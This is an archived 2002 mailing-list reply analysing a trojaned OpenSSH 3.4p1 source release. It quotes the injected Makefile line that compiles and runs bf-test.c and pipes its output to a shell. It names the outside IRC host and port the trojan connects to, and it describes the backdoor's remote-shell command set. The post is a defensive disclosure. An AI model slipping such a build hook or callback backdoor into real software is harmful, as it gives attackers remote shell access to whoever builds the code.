Firewall Wizards mailing list archives
Re: OpenSSH 3.4p1 possibly trojaned
From: hennings () skiinfo com
Date: 01 Aug 2002 14:46:44 +0200
| It would appear that the OpenSSH code for all the non-OpenBSD systems was | trojaned at some point pretty recently. (...) | all: libopenbsd-compat.a | + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh | ./bf-test.out & | | Trojan connection: | | 203.62.158.32:6667 (web.snsonline.net) More details: The source file (bf-test.c) contains a header with some spelling mistakes, and then blocks of binary data. When run, the binary block is deobfuscated and written to to a shell script in the current directory and then run from the Makefile. The generated script contains some C code, which is compiled and then run. It's forking, connecting to 203.62.158.32:6667, and reading commands from the socket, A, D or M. (D execs /bin/sh connected to the socket, A exits, and M seems to make the process sleep for a while.) Regards Henning Spjelkavik -- Skiinfo AS Christian Krohgsgate 60 Fax: 22114011 0186 Oslo Foretaksnr: 976036859 http://www.webinfo.no/ E-mail: info () webinfo no _______________________________________________ firewall-wizards mailing list firewall-wizards () honor icsalabs com http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
Current thread:
- OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned Paul D. Robertson (Aug 01)
- Re: OpenSSH 3.4p1 possibly trojaned hennings (Aug 01)